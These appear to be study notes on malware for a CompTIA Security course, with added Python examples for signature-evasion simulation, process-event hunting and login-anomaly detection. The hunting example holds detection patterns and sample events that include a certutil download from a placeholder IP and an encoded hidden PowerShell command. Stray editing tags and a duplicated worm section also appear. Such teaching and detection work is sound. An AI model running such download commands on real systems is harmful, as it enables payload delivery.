CompTIA Security – Malware
CompTIA IT Security Course
Section 6
Malware
Malware is any s/w designed to harm, disrupt or gain unauthorized access to a computer or its data
needs 2 things:
threat vector – the specific method the attacker uses to get the malware onto the system eg
via
unpatched s/w
installing code (eg a trojanized download)
phishing campaign
other vulnerabilities
the attack vector
means by which the attacker gains access and infects the system.. ie how they break in AND how they deliver the malware once in..
eg via
unauthorized login
social engineering
malware types covered in this section:
viruses
worms
trojans
RATs (remote access trojans)
ransomware
zombies/botnets
rootkits
backdoors/logic bombs
keyloggers
spyware/bloatware
VIRUS
multipartite virus is a combination of a boot sector virus and a program virus
it gets loaded every time the computer reboots, and then installs itself in a program.
even if an antivirus program removes the program virus, it may have missed the boot sector virus, which reinfects on the next boot!
encrypted virus
hides from signature-based AV by encrypting its body with a different key in each copy; only a small decryptor stub stays in the clear
polymorphic virus
advanced version of the encrypted virus; also changes the virus code (incl. the decryptor stub) each time it is executed in order to decrease the chance of detection, so there is no fixed byte sequence to sign
metamorphic virus
can rewrite themselves entirely (body as well as stub) before infecting – a further advance on polymorphic
stealth virus
a technique a virus uses to avoid being detected by AV s/w, eg intercepting OS/file-system calls so the infected file still looks unchanged
armored virus
has a layer of protection (obfuscation, anti-debugging, anti-disassembly) to make the virus hard to analyse and detect.
hoax virus
technically isn't a virus but a form of social engineering: a fake warning claiming your system is infected, eg in order to get you to install "cleanup" s/w or pay a ransom
</gra_replace>
<gr_replace lines="45-54" cat="clarify" orig="WORM">
WORM
self-replicating malware which spreads itself between diff computers over the network – unlike a virus it needs no user action or host file to spread
v dangerous for 2 reasons:
1. can infect computers
2. can disrupt network traffic and consume processing power
eg a DoS effect caused just by the scanning/replication traffic
they can spread in a very short period of time
eg Nimda (admin backwards) spread across the Internet in roughly 25 min; also
Conficker, one of the largest worms, infected up to 15 mill systems!
it exploited a Windows vulnerability MS had already patched (MS08-067) – unpatched machines got hit, so patching is the core defence
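Added example (not from the course) showing in Python why the encrypted, polymorphic and metamorphic variants above defeat static signatures, and what AV does about it. The "payload", the decryptor stubs and the rewrite rule are inert text strings standing in for machine code, and the on-disk layout stub|key|body is an assumption of the simulation, not a real file format.

```python
# Simulation of why static signatures fail against encrypted, polymorphic and
# metamorphic viruses. Everything here is inert data: the "payload" and "stubs"
# are strings standing in for machine code, nothing is executed.

PAYLOAD = b"MOV eax, infect_next_file ; CALL spread ; RET"

# Functionally equivalent decryptor loops; a polymorphic engine picks a different
# one (and different register/instruction choices) for every new copy (assumed).
STUB_VARIANTS = [
    b"XOR [esi], key ; INC esi ; LOOP decrypt",
    b"XOR [esi], key ; ADD esi, 1 ; LOOP decrypt",
    b"NOP ; XOR [esi], key ; INC esi ; JNZ decrypt",
]

# A metamorphic engine also rewrites the body itself into equivalent code (assumed rule).
BODY_REWRITES = {b"MOV eax, infect_next_file": b"PUSH infect_next_file ; POP eax"}


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def build(stub: bytes, key: int, body: bytes = PAYLOAD) -> bytes:
    """On-disk layout used by this simulation: <stub>|<key as 2 hex chars>|<XORed body>."""
    return stub + b"|" + f"{key:02x}".encode() + b"|" + xor_bytes(body, key)


def make_encrypted(key: int) -> bytes:
    # Encrypted virus: body changes with the key, but the decryptor stub is constant.
    return build(STUB_VARIANTS[0], key)


def make_polymorphic(key: int, generation: int) -> bytes:
    # Polymorphic: like encrypted, but the stub is mutated on each generation too.
    return build(STUB_VARIANTS[generation % len(STUB_VARIANTS)], key)


def make_metamorphic(key: int, generation: int) -> bytes:
    # Metamorphic: stub mutated AND the body rewritten into equivalent instructions.
    body = PAYLOAD
    for old, new in BODY_REWRITES.items():
        body = body.replace(old, new)
    return build(STUB_VARIANTS[generation % len(STUB_VARIANTS)], key, body)


def signature_scan(sample: bytes, signatures) -> bool:
    """Static AV check: does any fixed byte sequence appear in the file as stored on disk?"""
    return any(sig in sample for sig in signatures)


def emulate_and_scan(sample: bytes, signatures) -> bool:
    """Emulation: let the stub 'run' (undo the XOR) in a sandbox, then scan the decrypted body."""
    _stub, key_hex, body = sample.split(b"|", 2)
    return signature_scan(xor_bytes(body, int(key_hex, 16)), signatures)


def behaviour_scan(sample: bytes) -> bool:
    """Behavioural check: after decryption, does the code try to do what a virus does?"""
    _stub, key_hex, body = sample.split(b"|", 2)
    return b"CALL spread" in xor_bytes(body, int(key_hex, 16))


PAYLOAD_SIG = [b"MOV eax, infect_next_file ; CALL spread"]  # signature taken from the plain body
STUB_SIG = [STUB_VARIANTS[0]]                               # signature taken from the known decryptor


def detection_matrix() -> dict:
    """Which scanning strategy catches which variant (True = detected)."""
    enc = make_encrypted(0x41)
    poly = make_polymorphic(0x5a, 1)
    meta = make_metamorphic(0x23, 2)
    return {
        "plain/static": signature_scan(PAYLOAD, PAYLOAD_SIG),
        "encrypted/static": signature_scan(enc, PAYLOAD_SIG),
        "encrypted/stub-sig": signature_scan(enc, STUB_SIG),
        "polymorphic/stub-sig": signature_scan(poly, STUB_SIG),
        "polymorphic/emulated": emulate_and_scan(poly, PAYLOAD_SIG),
        "metamorphic/emulated": emulate_and_scan(meta, PAYLOAD_SIG),
        "metamorphic/behaviour": behaviour_scan(meta),
    }


if __name__ == "__main__":
    for check, hit in detection_matrix().items():
        print(f"{check:24s} detected={hit}")
```

The matrix is the point: a body signature only works on the plain copy, a stub signature rescues the encrypted case but not the polymorphic one, emulation recovers the polymorphic body but not a metamorphic rewrite, and only a behavioural check survives all three. That is why modern AV layers emulation and behaviour monitoring on top of signatures.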
WORM
is a virus which can replicate itself between diff computers
v dangerous for 2 reasons:
1. can infect computers
2. can disrupt network traffic and processing power
eg DoS attack
they can spread in very short period of time
eg Nimda (admin backwards) infected much of worlds PCs in 25min, also
Conficker one of the largest worms, infected up to 15 mill systems!
needed an MS patch
BOTNETS and ZOMBIES
Botnets are networks of comprimised machines called zombies who perform the task using remote commands
a botnet can have a lot of processing power
zombie is the individual comprimised computer node in the botnet
ROOTKIT
v powerful and difficult to detect as AVs can't easily find them – the rootkit hides its own files/processes from the very OS functions the AV relies on
gives admin/root level control without being detected – runs at the highest privilege level, OS ring 0 (kernel mode)
DLL injection – forcing a process to load a DLL which has been infected or replaced, eg using a shim…
shim = s/w code placed between 2 components (eg an app and the OS) to intercept calls; a legit compatibility feature that malware abuses
BACKDOORS = orig created by programmers to give a legit way into a program (bypassing normal auth) if there is a problem..
nowadays they are not in vogue as they are regarded as a security risk – any backdoor left in shipping code can be found and used by attackers
easter eggs = hidden jokes/features which pop up on a secret input; harmless in intent but unreviewed code in the product
logic bomb = malicious code which only executes when certain conditions are met (a date, a user being removed from the payroll, etc)
KEYLOGGERS
can be s/w or h/w based.
s/w often delivered via phishing or soc eng to infect
h/w has to be physically connected, eg a USB dongle between keyboard and PC
data theft (passwords, card numbers) a big risk with keyloggers
both for consumers/domestic users and corporates
how to counter:
update s/w patches regularly
use AV with up to date scanning
phishing/soc eng awareness for staff
use MFA systems – a captured password alone is then not enough
encrypt keystrokes in transit, eg ssh instead of telnet, so a network sniffer can't read them (note: a keylogger on the endpoint itself still sees the keys before encryption)
physical checks of PCs, laptops, servers for unknown devices
SPYWARE/BLOATWARE
spyware:
malicious s/w which gathers and sends info about a user or org to an outside party
can be bundled with normal s/w
installed via a malicious website
via clicking on a popup
bloatware:
any s/w preinstalled on a PC or device – regardless of whether you want or need it… takes up processing power and drive space
a marketing technique (vendor is paid to preinstall it)
can also be toolbars, extensions etc for browsers
can cause security issues: often unpatched, runs with high privileges, adds attack surface
can represent a potential threat vector.
best is to remove all bloatware which you don't need = there are tools, or you can remove manually
MALWARE ATTACK TECHNIQUES
Code injection – uses a legit process to run the attacker's code, so it inherits that process's trust and privileges
Masquerading – malware names/places itself to look like a legit file or process (eg svchost.exe in a temp dir)
DLL Injection – forcing a running process to load a malicious DLL
DLL Sideloading – planting a malicious DLL where a legit app will load it by name via the DLL search order
Process Hollowing – start a legit process suspended, replace its memory with malicious code, then resume it
the "living off the land" process… threat actors exploit standard OS tools, eg on Win – utilizing PowerShell cmds, WMI, certutil
rather than trying to use own homemade commands – nothing new dropped on disk, so less for AV to flag
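Added example (not from the course) of hunting for two of the techniques above, masquerading and living off the land, over a constructed list of process-creation events of the kind Sysmon or an EDR would log. The expected binary paths, the parent-process rule and the command-line patterns are my assumptions for the demo; the sample events are made up.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation event (fields a Sysmon/EDR log would carry; constructed here)."""
    image: str     # full path of the started executable
    parent: str    # image name of the parent process
    cmdline: str   # full command line


# Where Windows really keeps the binaries malware most often impersonates (assumed allow-list).
EXPECTED_PATH = {
    "svchost.exe": r"c:\windows\system32\svchost.exe",
    "lsass.exe": r"c:\windows\system32\lsass.exe",
    "explorer.exe": r"c:\windows\explorer.exe",
}
# On a healthy system svchost.exe is only ever started by services.exe (assumed rule).
EXPECTED_PARENT = {"svchost.exe": "services.exe"}

# Living-off-the-land: built-in tools invoked the way attackers, not admins, use them.
LOTL_PATTERNS = [
    (re.compile(r"powershell(\.exe)?\b.*\s-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
     "powershell encoded command"),
    (re.compile(r"powershell(\.exe)?\b.*-(nop|noprofile)\b.*-(w|windowstyle)\s+hidden", re.I),
     "powershell hidden window, no profile"),
    (re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*https?://", re.I),
     "certutil used as a downloader"),
    (re.compile(r"mshta(\.exe)?\b.*(https?:|javascript:|vbscript:)", re.I),
     "mshta running remote/inline script"),
]


def check_masquerading(ev: ProcEvent) -> list:
    """Flag well-known system binary names running from the wrong path or wrong parent."""
    name = ev.image.lower().rsplit("\\", 1)[-1]
    findings = []
    expected = EXPECTED_PATH.get(name)
    if expected and ev.image.lower() != expected:
        findings.append(f"masquerading: {name} running from {ev.image}")
    parent = EXPECTED_PARENT.get(name)
    if parent and ev.parent.lower() != parent:
        findings.append(f"masquerading: {name} spawned by {ev.parent}, expected {parent}")
    return findings


def check_lotl(ev: ProcEvent) -> list:
    """Flag command lines matching the living-off-the-land patterns."""
    return [f"lotl: {label}" for pat, label in LOTL_PATTERNS if pat.search(ev.cmdline)]


def hunt(events) -> list:
    """Return (image, finding) pairs for every rule that fires."""
    return [(ev.image, f) for ev in events for f in check_masquerading(ev) + check_lotl(ev)]


# Constructed sample events (not real telemetry). 198.51.100.0/24 is a documentation range.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\svchost.exe", "services.exe", "svchost.exe -k netsvcs"),
    ProcEvent(r"C:\Users\bob\AppData\Local\Temp\svchost.exe", "explorer.exe", "svchost.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "WINWORD.EXE",
              "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcEvent(r"C:\Windows\System32\certutil.exe", "cmd.exe",
              "certutil.exe -urlcache -split -f http://198.51.100.7/update.exe update.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", "userinit.exe", "explorer.exe"),
]

if __name__ == "__main__":
    for image, finding in hunt(SAMPLE_EVENTS):
        print(f"{finding:60s} <- {image}")
```

Only the genuine svchost.exe and explorer.exe come out clean; the copy of svchost.exe in a user's Temp folder fires twice (wrong path, wrong parent), the Word-spawned PowerShell fires on both the encoded command and the hidden/no-profile flags, and certutil fetching an executable over HTTP is the classic LotL download. In real telemetry add the parent-process rule for PowerShell launched by Office apps too.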
INDICATIONS OF MALWARE ATTACKS
9 indications
Account lockouts – malware can trigger multiple lockouts (eg password guessing); can be a red flag if many users have this problem all of a sudden
Concurrent session utilization – most users only have one session active; if one or more suddenly have multiple sessions open, this can be an indication (stolen creds in use)
blocked content – if more content than usual is getting blocked (C2 callbacks, downloads)
impossible travel – someone logging in from one geographic location and then a few mins later from a location much further away than could be travelled in that time!
resource consumption – botnets, worms etc can consume large amounts of resources – memory, processes, network traffic
resource inaccessibility – if machines or volumes suddenly not responding or cannot be logged into or connected to (eg ransomware encrypting shares)
out of cycle or out of hours logging – can be an indication if people usually just work 9-5
missing logs – a strong sign: attackers clear logs to cover their tracks
published or documented attacks = if news media finds out and reports that you are compromised before you do!
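Added example (not from the course) turning four of the indicators above into detection logic in Python: impossible travel, concurrent sessions, out-of-hours logons and a burst of account lockouts. The authentication events are constructed (documentation IP ranges, made-up users), the lat/lon would normally come from an upstream IP geolocation step, and every threshold is an assumption you would tune for your own environment.

```python
import math
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed authentication events (not real logs). Lat/lon would normally come
# from an IP geolocation lookup done upstream; here it is embedded directly.
# fields: timestamp (UTC, ISO 8601), user, event, source IP, lat, lon
EVENTS = [
    ("2024-03-04T08:58:00", "alice", "logon_ok", "203.0.113.10", 51.51, -0.13),    # London
    ("2024-03-04T09:20:00", "alice", "logon_ok", "198.51.100.22", 40.71, -74.01),  # New York, 22 min later
    ("2024-03-04T09:01:00", "bob", "logon_ok", "203.0.113.11", 51.51, -0.13),
    ("2024-03-04T09:03:00", "bob", "logon_ok", "203.0.113.12", 51.52, -0.12),      # 2nd session, same office
    ("2024-03-04T09:04:00", "bob", "logon_ok", "203.0.113.13", 51.50, -0.14),      # 3rd session
    ("2024-03-04T03:12:00", "carol", "logon_ok", "203.0.113.40", 51.51, -0.13),    # 03:12, out of hours
    # ten different accounts locked out within 45 seconds (looks like password spraying)
    *[(f"2024-03-04T09:10:{s:02d}", f"user{n}", "lockout", "203.0.113.99", 51.51, -0.13)
      for n, s in enumerate(range(0, 50, 5))],
]

MAX_SPEED_KMH = 900.0           # faster than an airliner => "impossible travel" (assumed threshold)
BUSINESS_HOURS = range(7, 20)   # 07:00-19:59 UTC counts as normal (assumed)
SESSION_WINDOW = timedelta(minutes=15)
MAX_SESSIONS = 2                # more concurrent logons than this is suspicious (assumed)
LOCKOUT_WINDOW = timedelta(minutes=5)
LOCKOUT_ACCOUNTS = 5            # distinct accounts locked within the window (assumed)


def parse(events):
    return [(datetime.fromisoformat(ts), u, e, ip, lat, lon) for ts, u, e, ip, lat, lon in events]


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in km between two lat/lon points."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi, dlam = math.radians(lat2 - lat1), math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * 6371.0 * math.asin(math.sqrt(a))


def impossible_travel(events):
    """Consecutive successful logons per user whose implied speed exceeds MAX_SPEED_KMH."""
    by_user = defaultdict(list)
    for ts, u, e, ip, lat, lon in parse(events):
        if e == "logon_ok":
            by_user[u].append((ts, ip, lat, lon))
    alerts = []
    for u, logons in by_user.items():
        logons.sort()
        for (t1, ip1, la1, lo1), (t2, ip2, la2, lo2) in zip(logons, logons[1:]):
            hours = (t2 - t1).total_seconds() / 3600
            km = haversine_km(la1, lo1, la2, lo2)
            if hours > 0 and km / hours > MAX_SPEED_KMH:   # hours == 0: same-second logons, skip
                alerts.append((u, ip1, ip2, round(km), round(km / hours)))
    return alerts


def concurrent_sessions(events):
    """Users with more than MAX_SESSIONS successful logons inside one SESSION_WINDOW."""
    by_user = defaultdict(list)
    for ts, u, e, *_ in parse(events):
        if e == "logon_ok":
            by_user[u].append(ts)
    flagged = {}
    for u, times in by_user.items():
        times.sort()
        for i, t in enumerate(times):
            active = sum(1 for x in times[i:] if x - t <= SESSION_WINDOW)
            if active > MAX_SESSIONS:
                flagged[u] = max(flagged.get(u, 0), active)
    return flagged


def out_of_hours(events):
    """Users with a successful logon outside BUSINESS_HOURS."""
    return sorted({u for ts, u, e, *_ in parse(events) if e == "logon_ok" and ts.hour not in BUSINESS_HOURS})


def lockout_spike(events):
    """Most distinct accounts locked out inside one LOCKOUT_WINDOW, or 0 if below the threshold."""
    lockouts = sorted((ts, u) for ts, u, e, *_ in parse(events) if e == "lockout")
    worst = 0
    for i, (t, _) in enumerate(lockouts):
        users = {u for ts, u in lockouts[i:] if ts - t <= LOCKOUT_WINDOW}
        worst = max(worst, len(users))
    return worst if worst >= LOCKOUT_ACCOUNTS else 0


if __name__ == "__main__":
    print("impossible travel  :", impossible_travel(EVENTS))
    print("concurrent sessions:", concurrent_sessions(EVENTS))
    print("out of hours       :", out_of_hours(EVENTS))
    print("lockout spike      :", lockout_spike(EVENTS))
```

On the sample data alice is flagged for London to New York in 22 minutes (roughly 15,000 km/h), bob for three sessions inside 15 minutes, carol for a 03:12 logon, and the ten lockouts in under a minute trip the spray threshold. Each rule alone produces false positives (VPN exits, shift workers, a mistyped shared password), which is why the course lists them as indications to investigate rather than proof of compromise.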